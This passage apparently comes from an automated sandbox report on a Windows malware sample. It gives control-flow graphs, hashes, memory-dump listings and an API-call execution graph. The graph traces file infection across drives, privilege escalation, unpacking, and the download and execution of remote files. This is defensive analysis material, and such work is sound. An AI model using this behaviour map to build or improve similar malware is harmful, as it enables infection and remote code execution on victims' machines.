                          • Associated: 00000001.00000002.1325839186.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_400000_biKy3nZEyJ.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1d74de621471113eeeb8add9240d3a41931af28086330595ed0f5070e02ead39
                          • Instruction ID: 3fed552dc0f16c94019d21b909574d6693bb4f651eae2b4a6156c6236d19073f
                          • Opcode Fuzzy Hash: 1d74de621471113eeeb8add9240d3a41931af28086330595ed0f5070e02ead39
                          • Instruction Fuzzy Hash:

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 192 44b180-44b199 call 44b740 195 44b1ab-44b228 call 442530 call 442500 call 4424e0 * 2 call 442530 192->195 196 44b19b-44b1aa 192->196 208 44b23a-44b285 call 442530 call 4424e0 call 44be20 call 44a760 195->208 209 44b22a-44b239 195->209 217 44b28a-44b2f5 Sleep 208->217 219 44b2fc-44b333 217->219 221 44b335-44b353 call 444570 219->221 222 44b357-44b35c 219->222 221->222 224 44b362-44b36e 222->224 225 44b4ae-44b4bd Sleep 222->225 228 44b374-44b391 224->228 229 44b4a3-44b4a8 224->229 225->217 227 44b4c3-44b4e2 LocalFree * 2 225->227 230 44b4e4 227->230 231 44b556-44b58d call 442500 LocalFree 227->231 232 44b395-44b3c3 call 442500 228->232 229->219 229->225 230->231 235 44b4e6-44b4fe 230->235 242 44b595-44b5a6 call 44be20 231->242 243 44b58f 231->243 240 44b3c5 232->240 241 44b422-44b42a 232->241 238 44b502-44b543 call 442500 call 449ef0 235->238 260 44b545-44b549 238->260 261 44b54d-44b554 238->261 247 44b3cc-44b3de call 444570 240->247 244 44b42c 241->244 245 44b459-44b45e 241->245 243->242 249 44b431-44b443 call 444570 244->249 252 44b460-44b48f 245->252 253 44b498-44b49d 245->253 262 44b3e0-44b3f5 call 444570 247->262 263 44b40e-44b416 247->263 264 44b445 249->264 265 44b44d-44b457 249->265 252->253 258 44b491-44b494 252->258 253->229 253->232 258->253 260->261 261->231 261->238 262->263 269 44b3f7-44b40c call 444570 262->269 263->247 267 44b418 263->267 264->265 265->245 265->249 267->241 269->263 272 44b41a 269->272 272->241
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.1325278499.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000001.00000002.1325264255.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325537851.000000000065C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325600601.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325619650.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325619650.00000000006E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325705190.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325719472.00000000006E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325734513.00000000006EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325734513.0000000000733000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325734513.0000000000737000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325734513.0000000000739000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325805483.000000000073B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325824957.0000000000740000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325839186.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_400000_biKy3nZEyJ.jbxd
                          Similarity
                          • API ID:
                          • String ID: HLSERVER*
                          • API String ID: 0-957054744
                          • Opcode ID: fd45598dca43effb716ce62f909105a5dfc324d518f9801d4848c510911b8a64
                          • Instruction ID: 68eca3d0c2f42d524363f67ecf98b10ab73a3c77c18b9f59a22a3ad83c37190b
                          • Opcode Fuzzy Hash: fd45598dca43effb716ce62f909105a5dfc324d518f9801d4848c510911b8a64
                          • Instruction Fuzzy Hash: 86B1C071944301ABE720DF24DC42B6B77E4FB84708F00592EF98597282E7B9D949CBDA

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 384 447880-44789b call 4453d0 387 4478ad-4478da call 442840 384->387 388 44789d-4478ac 384->388 391 4478e0-4478e5 387->391 392 447981 387->392 391->392 393 4478eb-4478fa 391->393 394 447986-447988 392->394 393->392 395 447900-44790e 393->395 396 4479dc-447a0a call 4456c0 call 4445a0 394->396 397 44798a-4479bc call 442970 OpenSemaphoreA 394->397 398 447927-44792f 395->398 399 447910-447926 395->399 410 447c70-447c7a 396->410 411 447a10 396->411 397->396 408 4479be-4479db CloseHandle 397->408 398->394 402 447931-44794f ReleaseSemaphore 398->402 406 447951-447967 402->406 407 447968-44797f CloseHandle 402->407 407->394 412 447a12-447a28 call 444d10 411->412 415 447a71-447a80 412->415 416 447a2a-447a2d 412->416 417 447a34-447a48 call 444510 416->417 418 447a2f-447a32 416->418 419 447a4f-447a51 417->419 423 447a4a 417->423 418->417 418->419 419->412 422 447a53-447a55 419->422 424 447a57-447a70 422->424 425 447a81-447a88 422->425 423->419 426 447ab3-447ab8 call 444500 425->426 427 447a8a-447aa5 call 443510 425->427 431 447abd-447ad7 426->431 427->426 432 447aa7-447ab1 call 4444c0 427->432 431->410 433 447add-447ae5 431->433 432->431 433->410 435 447c66 433->435 436 447c27-447c3b 433->436 437 447b40-447b54 433->437 438 447b01-447b15 433->438 439 447aec-447b00 433->439 440 447be8-447bfc 433->440 441 447ba9-447bbd 433->441 442 447b6a-447b7e 433->442 443 447b2b-447b3f 433->443 444 447b94-447ba8 433->444 445 447b55-447b69 433->445 446 447b16-447b2a 433->446 447 447c51-447c65 433->447 448 447c12-447c26 433->448 449 447bd3-447be7 433->449 450 447c3c-447c50 433->450 451 447bfd-447c11 433->451 452 447bbe-447bd2 433->452 453 447b7f-447b93 433->453 435->410
                          Memory Dump Source
                          • Source File: 00000001.00000002.1325278499.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000001.00000002.1325264255.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325537851.000000000065C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325600601.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325619650.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325619650.00000000006E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325705190.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325719472.00000000006E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325734513.00000000006EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325734513.0000000000733000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325734513.0000000000737000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325734513.0000000000739000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325805483.000000000073B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325824957.0000000000740000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325839186.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_400000_biKy3nZEyJ.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 701717f76f5fe287e7d309bb2a5ec2d4c4f1fcacca32e3f437aabca2e8024746
                          • Instruction ID: db78036c0407077dc33b3c98e79fd2754e219730d596cdf3bd1da380166198d1
                          • Opcode Fuzzy Hash: 701717f76f5fe287e7d309bb2a5ec2d4c4f1fcacca32e3f437aabca2e8024746
                          • Instruction Fuzzy Hash: 9C912476B412045FFB24BB18FC86BEA7391E781B36F94113BDE0481290D77F914E86A6

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 455 44a2e0-44a30c call 44b740 458 44a31e-44a370 call 4424e0 * 2 call 442530 455->458 459 44a30e-44a31d 455->459 466 44a382-44a3c9 call 442530 call 4424e0 call 44be20 458->466 467 44a372-44a381 458->467 474 44a3cd-44a42b Sleep 466->474 476 44a432-44a469 474->476 478 44a48d-44a492 476->478 479 44a46b-44a489 call 444570 476->479 481 44a5ae-44a5b2 478->481 482 44a498-44a4a0 478->482 479->478 481->474 483 44a5b8-44a5bd call 44a760 481->483 485 44a4a6-44a4c1 482->485 486 44a5a3-44a5a8 482->486 491 44a5c4-44a5c8 483->491 488 44a4c5-44a4f6 call 442500 485->488 486->476 486->481 495 44a55c-44a561 488->495 496 44a4f8 488->496 493 44a5fd-44a609 491->493 494 44a5ca-44a5d2 491->494 493->491 500 44a60b-44a625 LocalFree * 2 493->500 494->493 497 44a5d4-44a5d9 494->497 498 44a563-44a592 495->498 499 44a59b-44a59d 495->499 501 44a4ff-44a511 call 444570 496->501 502 44a5dc-44a5ea call 444570 497->502 498->499 503 44a594-44a597 498->503 499->486 499->488 504 44a713-44a745 call 4424e0 * 2 500->504 505 44a62b 500->505 512 44a541-44a550 501->512 513 44a513-44a528 call 444570 501->513 522 44a5f1-44a5fb 502->522 523 44a5ec 502->523 503->499 511 44a748-44a75b call 44be20 504->511 510 44a631-44a638 505->510 505->511 517 44a63a-44a63d 510->517 512->501 521 44a552 512->521 513->512 531 44a52a-44a53f call 444570 513->531 518 44a643-44a66e call 442500 517->518 519 44a6f9-44a701 517->519 532 44a670 518->532 533 44a678-44a67b 518->533 519->517 528 44a707 519->528 521->495 522->493 522->502 523->522 528->511 531->512 542 44a554 531->542 535 44a6a7-44a6b4 532->535 536 44a672-44a674 532->536 538 44a67d-44a680 533->538 539 44a689-44a696 533->539 546 44a6d2-44a6d3 call 449ef0 535->546 540 44a676 536->540 541 44a698-44a6a5 536->541 543 44a6b6-44a6c3 call 44bb00 538->543 544 44a682-44a687 538->544 545 44a6db-44a6ef 539->545 540->539 541->546 542->495 551 44a6d8 543->551 544->539 549 44a6c5-44a6cc 544->549 545->519 548 44a6f1-44a6f7 545->548 546->551 548->519 552 44a709-44a711 548->552 549->546 551->545 552->511
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.1325278499.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000001.00000002.1325264255.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325537851.000000000065C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325600601.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325619650.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325619650.00000000006E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325705190.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325719472.00000000006E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325734513.00000000006EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325734513.0000000000733000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325734513.0000000000737000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325734513.0000000000739000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325805483.000000000073B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325824957.0000000000740000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325839186.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_400000_biKy3nZEyJ.jbxd
                          Similarity
                          • API ID:
                          • String ID: HLSERVER*
                          • API String ID: 0-957054744
                          • Opcode ID: 09aabef86f9e71416445cf1ff0a91cc696f79f3c95a9a1e4baad9ba26417a56a
                          • Instruction ID: 414a6989aa7181aa4c89ac1ab9b235a0e7efefaa3f73ce74a9a2122661ee6fb3
                          • Opcode Fuzzy Hash: 09aabef86f9e71416445cf1ff0a91cc696f79f3c95a9a1e4baad9ba26417a56a
                          • Instruction Fuzzy Hash: 4DC1C171984301ABF720DF20DD41B6BB3E4BB84708F14482EF9899B281E779D955CB9B

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 623 446d40-446d59 call 4453d0 626 446d6b-446dbb call 4424e0 * 2 call 442530 623->626 627 446d5b-446d6a 623->627 635 446dcd-446de7 call 442530 626->635 636 446dbd-446dcc 626->636 639 446e00-446e27 call 44be20 635->639 640 446de9-446dff LocalFree 635->640 645 446e2f-446e4c Sleep 639->645 646 446e53-446e9a 645->646 648 446e9c 646->648 649 446e9e-446ea0 646->649 648->649 650 446ea6-446ec7 649->650 651 446f3e-446f42 649->651 656 446ed5 650->656 657 446ec9-446ed3 650->657 651->645 652 446f48-446f4d 651->652 654 446f5e 652->654 655 446f4f-446f5c LocalFree 652->655 658 446f64-446f66 654->658 655->658 659 446ed7-446ed9 656->659 657->656 657->659 660 446f68-446f69 LocalFree 658->660 661 446f6b-446f75 658->661 659->651 662 446edb-446ee3 659->662 660->661 663 446ee5-446eea 662->663 664 446f36-446f38 662->664 665 446eee-446efa 663->665 664->646 664->651 666 446f32-446f34 665->666 667 446efc-446f2f call 4424e0 call 442500 call 446f80 665->667 666->664 666->665 667->666
                          Memory Dump Source
                          • Source File: 00000001.00000002.1325278499.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000001.00000002.1325264255.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325537851.000000000065C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325600601.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325619650.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325619650.00000000006E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325705190.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325719472.00000000006E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325734513.00000000006EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325734513.0000000000733000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325734513.0000000000737000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325734513.0000000000739000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325805483.000000000073B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325824957.0000000000740000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325839186.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_400000_biKy3nZEyJ.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8b5c7168302d51b7f4118bd3c1982a2a15ed99ddf1b8f239ed663b8aee24682b
                          • Instruction ID: 6ef43b866e82f3513f8c0b0e81522870bcf4ae598b1323f2f16c687a8000aed2
                          • Opcode Fuzzy Hash: 8b5c7168302d51b7f4118bd3c1982a2a15ed99ddf1b8f239ed663b8aee24682b
                          • Instruction Fuzzy Hash: CD51E5B16403016BF720AF50EC45BAB73A4EF81715F40042EFA45962C1EBBDD9198B9A

                          Execution Graph

                          Execution Coverage:31.9%
                          Dynamic/Decrypted Code Coverage:10.4%
                          Signature Coverage:18.9%
                          Total number of Nodes:297
                          Total number of Limit Nodes:12
                          execution_graph 1014 f76076 1015 f7607b 1014->1015 1019 f760c7 1014->1019 1017 f760b0 VirtualAlloc 1015->1017 1015->1019 1026 f761b2 1015->1026 1016 f7615f VirtualFree 1016->1019 1017->1019 1018 f76198 VirtualFree 1018->1026 1019->1016 1019->1018 1020 f760d5 VirtualAlloc 1019->1020 1020->1019 1021 f76389 VirtualProtect 1024 f763b7 1021->1024 1022 f763fc VirtualProtect 1023 f76400 1022->1023 1024->1022 1025 f763e7 VirtualProtect 1024->1025 1025->1022 1025->1024 1026->1021 1027 f762fb 1026->1027 1343 f76014 1344 f76035 GetModuleHandleA 1343->1344 1347 f7605f 1343->1347 1345 f7604d GetProcAddress 1344->1345 1346 f76058 1345->1346 1346->1345 1346->1347 1028 f714e1 1029 f71541 1028->1029 1030 f714fd GetModuleHandleA 1028->1030 1032 f71573 1029->1032 1033 f71549 1029->1033 1031 f7151a VirtualQuery 1030->1031 1035 f71512 1030->1035 1031->1035 1039 f71638 GetTempPathA GetSystemDirectoryA GetModuleFileNameA 1032->1039 1036 f71566 1033->1036 1056 f71af9 1033->1056 1035->1029 1037 f71579 ExitProcess 1040 f7167f 1039->1040 1041 f7167a 1039->1041 1062 f71718 GetSystemTimeAsFileTime 1040->1062 1074 f7139f GetVersionExA 1041->1074 1044 f71686 1045 f716ca 1044->1045 1050 f716a0 CreateThread 1044->1050 1046 f716d7 1045->1046 1047 f716d0 1045->1047 1048 f7170f 1046->1048 1049 f716dd lstrcpy 1046->1049 1095 f71581 1047->1095 1048->1037 1049->1037 1067 f72c48 memset 1050->1067 1311 f71099 1050->1311 1055 f71718 3 API calls 1055->1045 1057 f71b11 1056->1057 1058 f71b09 1056->1058 1060 f71b16 CreateThread 1057->1060 1061 f71b0f 1057->1061 1059 f71638 188 API calls 1058->1059 1059->1061 1060->1061 1330 f71638 189 API calls 1060->1330 1061->1036 1061->1061 1063 f71735 SHSetValueA 1062->1063 1064 f71754 1062->1064 1066 f71786 __aulldiv 1063->1066 1065 f7175a SHGetValueA 1064->1065 1064->1066 1065->1066 1066->1044 1101 f71973 PathFileExistsA 1067->1101 1070 f72cb2 1072 f72cbb VirtualFree 1070->1072 1073 f716ba WaitForSingleObject 1070->1073 1071 f72c8f CreateThread WaitForMultipleObjects 1071->1070 1123 f72b8c memset GetLogicalDriveStringsA 1071->1123 1072->1073 1073->1055 1075 f713cf LookupPrivilegeValueA 1074->1075 1076 f714da 1074->1076 1077 f713e7 1075->1077 1078 f713ef 1075->1078 1076->1040 1291 f7119f GetCurrentProcess OpenProcessToken 1077->1291 1078->1076 1296 f7120e GetModuleHandleA GetProcAddress 1078->1296 1084 f71448 GetCurrentProcessId 1084->1076 1085 f71457 1084->1085 1085->1076 1086 f71319 3 API calls 1085->1086 1087 f7147f 1086->1087 1088 f71319 3 API calls 1087->1088 1089 f7148e 1088->1089 1089->1076 1090 f71319 3 API calls 1089->1090 1091 f714b4 1090->1091 1092 f71319 3 API calls 1091->1092 1093 f714c3 1092->1093 1094 f71319 3 API calls 1093->1094 1094->1076 1310 f7185b GetSystemTimeAsFileTime srand rand srand rand 1095->1310 1097 f71592 wsprintfA wsprintfA lstrlen CreateFileA 1098 f71633 1097->1098 1099 f715fb WriteFile CloseHandle 1097->1099 1098->1048 1099->1098 1100 f7161d ShellExecuteA 1099->1100 1100->1098 1102 f719a0 1101->1102 1104 f71ac7 1101->1104 1103 f719af CreateFileA 1102->1103 1105 f719c4 Sleep 1103->1105 1106 f71a28 GetFileSize 1103->1106 1104->1070 1104->1071 1105->1103 1107 f719d5 1105->1107 1108 f71a38 1106->1108 1116 f71a80 1106->1116 1122 f7185b GetSystemTimeAsFileTime srand rand srand rand 1107->1122 1109 f71a3d VirtualAlloc 1108->1109 1108->1116 1109->1116 1120 f71a53 1109->1120 1110 f71a96 1113 f71aad 1110->1113 1114 f71a9c DeleteFileA 1110->1114 1111 f71a8d FindCloseChangeNotification 1111->1110 1113->1104 1121 f71ab8 VirtualFree 1113->1121 1114->1113 1115 f719da wsprintfA CopyFileA 1115->1106 1119 f71a0d CreateFileA 1115->1119 1116->1110 1116->1111 1117 f71a59 ReadFile 1117->1116 1117->1120 1119->1106 1119->1114 1120->1116 1120->1117 1121->1104 1122->1115 1124 f72c09 WaitForMultipleObjects 1123->1124 1129 f72bc8 1123->1129 1125 f72c3c 1124->1125 1126 f72c2a CreateThread 1124->1126 1126->1125 1134 f72845 1126->1134 1127 f72bfa lstrlen 1127->1124 1127->1129 1128 f72bd2 GetDriveTypeA 1128->1127 1128->1129 1129->1127 1129->1128 1130 f72be3 CreateThread 1129->1130 1130->1127 1131 f72b7d 1130->1131 1144 f729e2 memset wsprintfA 1131->1144 1281 f7274a memset memset SHGetSpecialFolderPathA wsprintfA 1134->1281 1136 f72853 1137 f72878 DeleteFileA 1136->1137 1140 f72692 8 API calls 1136->1140 1143 f7239d 186 API calls 1136->1143 1138 f7288c VirtualFree 1137->1138 1139 f7289a 1137->1139 1138->1139 1141 f728a4 CloseHandle 1139->1141 1142 f728ab 1139->1142 1140->1136 1141->1142 1143->1136 1145 f72abc memset memset FindFirstFileA 1144->1145 1146 f72a3a memset lstrlen lstrcpyn strrchr 1144->1146 1158 f728b8 memset wsprintfA 1145->1158 1146->1145 1147 f72a88 1146->1147 1147->1145 1149 f72a9a lstrcmpiA 1147->1149 1151 f72b74 1149->1151 1152 f72aad lstrlen 1149->1152 1152->1145 1152->1149 1153 f72b61 FindNextFileA 1154 f72b23 1153->1154 1155 f72b6d FindClose 1153->1155 1156 f72b35 lstrcmpiA 1154->1156 1157 f728b8 174 API calls 1154->1157 1155->1151 1156->1154 1156->1155 1157->1153 1159 f72905 1158->1159 1166 f72951 memset 1158->1166 1160 f72956 strrchr 1159->1160 1161 f7291b memset wsprintfA 1159->1161 1159->1166 1162 f72967 lstrcmpiA 1160->1162 1160->1166 1163 f729e2 180 API calls 1161->1163 1164 f7297a 1162->1164 1165 f72988 lstrcmpiA 1162->1165 1163->1166 1176 f71e6e 1164->1176 1165->1166 1168 f72994 1165->1168 1166->1153 1169 f729ad strstr 1168->1169 1170 f729a5 lstrcpy 1168->1170 1171 f729d3 1169->1171 1172 f729cb 1169->1172 1170->1169 1241 f72692 1171->1241 1219 f7239d strstr 1172->1219 1177 f71e7d 1176->1177 1250 f71df6 strrchr 1177->1250 1180 f72332 1184 f72346 1180->1184 1185 f7233d UnmapViewOfFile 1180->1185 1181 f71eb0 SetFileAttributesA CreateFileA 1181->1180 1182 f71edf 1181->1182 1255 f71915 1182->1255 1187 f72350 1184->1187 1188 f7234b FindCloseChangeNotification 1184->1188 1185->1184 1189 f72356 CloseHandle 1187->1189 1190 f72391 1187->1190 1188->1187 1189->1190 1190->1166 1191 f71f2e 1191->1180 1261 f71c81 1191->1261 1195 f71f92 1196 f71c81 2 API calls 1195->1196 1197 f71f9f 1196->1197 1197->1180 1198 f71af9 169 API calls 1197->1198 1199 f72024 1197->1199 1203 f71fc0 1198->1203 1199->1180 1200 f71af9 169 API calls 1199->1200 1201 f7207a 1200->1201 1202 f71af9 169 API calls 1201->1202 1207 f72090 1202->1207 1203->1180 1203->1199 1204 f71af9 169 API calls 1203->1204 1205 f71ffe 1204->1205 1206 f72013 FlushViewOfFile 1205->1206 1206->1199 1208 f720bb memset memset 1207->1208 1209 f720f5 1208->1209 1210 f71c81 2 API calls 1209->1210 1212 f721de 1210->1212 1211 f72226 memcpy UnmapViewOfFile FindCloseChangeNotification 1266 f71b8a 1211->1266 1212->1211 1214 f7226e 1274 f7185b GetSystemTimeAsFileTime srand rand srand rand 1214->1274 1216 f722ab SetFilePointer SetEndOfFile SetFilePointer WriteFile WriteFile 1217 f71915 3 API calls 1216->1217 1218 f7231f FindCloseChangeNotification 1217->1218 1218->1180 1220 f72451 CreateFileA GetFileSize 1219->1220 1221 f723d8 1219->1221 1222 f72675 CloseHandle 1220->1222 1223 f72480 1220->1223 1221->1220 1226 f72687 1221->1226 1224 f7267c RemoveDirectoryA 1222->1224 1223->1222 1225 f72499 1223->1225 1224->1226 1227 f71915 3 API calls 1225->1227 1226->1166 1228 f724a4 9 API calls 1227->1228 1276 f7189d memset CreateProcessA 1228->1276 1231 f7255c Sleep memset wsprintfA 1232 f729e2 163 API calls 1231->1232 1233 f72597 memset wsprintfA Sleep 1232->1233 1234 f7189d 6 API calls 1233->1234 1235 f725e4 Sleep CreateFileA 1234->1235 1236 f71915 3 API calls 1235->1236 1237 f72610 CloseHandle 1236->1237 1237->1224 1238 f7261e 1237->1238 1238->1224 1239 f72641 SetFilePointer WriteFile 1238->1239 1239->1224 1240 f72667 SetEndOfFile 1239->1240 1240->1224 1242 f726b2 WaitForSingleObject 1241->1242 1243 f726a2 CreateEventA 1241->1243 1244 f726c1 lstrlen ??2@YAPAXI 1242->1244 1245 f72708 1242->1245 1243->1242 1246 f72736 SetEvent 1244->1246 1247 f726da lstrcpy 1244->1247 1245->1246 1249 f72718 lstrcpy ??3@YAXPAX 1245->1249 1246->1166 1248 f726f1 1247->1248 1248->1246 1249->1248 1251 f71e13 lstrcpy strrchr 1250->1251 1252 f71e62 1250->1252 1251->1252 1253 f71e40 lstrcmpiA 1251->1253 1252->1180 1252->1181 1253->1252 1254 f71e52 lstrlen 1253->1254 1254->1252 1254->1253 1256 f71928 1255->1256 1260 f71924 SetFilePointer CreateFileMappingA MapViewOfFile 1255->1260 1257 f7194f 1256->1257 1258 f7192e memset GetFileTime 1256->1258 1259 f71954 SetFileTime 1257->1259 1257->1260 1258->1260 1259->1260 1260->1180 1260->1191 1262 f71c9c 1261->1262 1264 f71c94 1261->1264 1263 f71cae memset memset 1262->1263 1262->1264 1263->1264 1264->1180 1265 f7185b GetSystemTimeAsFileTime srand rand srand rand 1264->1265 1265->1195 1267 f71b93 1266->1267 1275 f7185b GetSystemTimeAsFileTime srand rand srand rand 1267->1275 1269 f71bca srand 1270 f71bd8 rand 1269->1270 1271 f71c08 1270->1271 1271->1270 1272 f71c29 memset memcpy lstrcat 1271->1272 1272->1214 1274->1216 1275->1269 1277 f718e0 CloseHandle WaitForSingleObject 1276->1277 1278 f7190c 1276->1278 1279 f71907 CloseHandle 1277->1279 1280 f718fb GetExitCodeProcess 1277->1280 1278->1224 1278->1231 1279->1278 1280->1279 1290 f7185b GetSystemTimeAsFileTime srand rand srand rand 1281->1290 1283 f727b5 wsprintfA CopyFileA 1284 f72840 1283->1284 1285 f727de wsprintfA 1283->1285 1284->1136 1286 f71973 17 API calls 1285->1286 1287 f7280f 1286->1287 1288 f72813 DeleteFileA 1287->1288 1289 f72820 CreateFileA 1287->1289 1288->1289 1289->1284 1290->1283 1292 f711c6 AdjustTokenPrivileges 1291->1292 1293 f71200 CloseHandle 1291->1293 1294 f711f7 CloseHandle 1292->1294 1295 f711f6 1292->1295 1293->1078 1294->1293 1295->1294 1297 f71310 1296->1297 1298 f7123f GetCurrentProcessId OpenProcess 1296->1298 1297->1076 1305 f71319 1297->1305 1298->1297 1299 f71262 1298->1299 1300 f712b0 VirtualAlloc 1299->1300 1301 f712f1 CloseHandle 1299->1301 1303 f71296 VirtualFree 1299->1303 1304 f712b8 1299->1304 1300->1299 1300->1304 1301->1297 1302 f71302 VirtualFree 1301->1302 1302->1297 1303->1300 1304->1301 1306 f7134a 1305->1306 1307 f7132a GetModuleHandleA GetProcAddress 1305->1307 1308 f71351 memset 1306->1308 1309 f71363 1306->1309 1307->1306 1307->1309 1308->1309 1309->1076 1309->1084 1310->1097 1312 f71196 1311->1312 1313 f710ba 1311->1313 1313->1312 1329 f7185b GetSystemTimeAsFileTime srand rand srand rand 1313->1329 1315 f71118 wsprintfA wsprintfA URLDownloadToFileA 1316 f710dc 1315->1316 1317 f71168 lstrlen Sleep 1315->1317 1320 f71000 CreateFileA 1316->1320 1317->1313 1321 f71025 GetFileSize CreateFileMappingA MapViewOfFile 1320->1321 1322 f71092 WinExec lstrlen 1320->1322 1323 f71057 1321->1323 1324 f7107b 1321->1324 1322->1312 1322->1313 1325 f71074 UnmapViewOfFile 1323->1325 1326 f71061 1323->1326 1327 f71087 CloseHandle 1324->1327 1328 f7108d CloseHandle 1324->1328 1325->1324 1326->1325 1327->1328 1328->1322 1329->1315 1348 f72361 1349 f72374 1348->1349 1350 f7236b UnmapViewOfFile 1348->1350 1351 f72382 1349->1351 1352 f72379 CloseHandle 1349->1352 1350->1349 1353 f72388 CloseHandle 1351->1353 1354 f72391 1351->1354 1352->1351 1353->1354 1331 f7615d VirtualFree 1339 f760c7 1331->1339 1332 f76198 VirtualFree 1341 f761b2 1332->1341 1333 f760d5 VirtualAlloc 1333->1339 1334 f76389 VirtualProtect 1338 f763b7 1334->1338 1335 f763fc VirtualProtect 1336 f76400 1335->1336 1337 f7615f VirtualFree 1337->1339 1338->1335 1340 f763e7 VirtualProtect 1338->1340 1339->1332 1339->1333 1339->1337 1340->1335 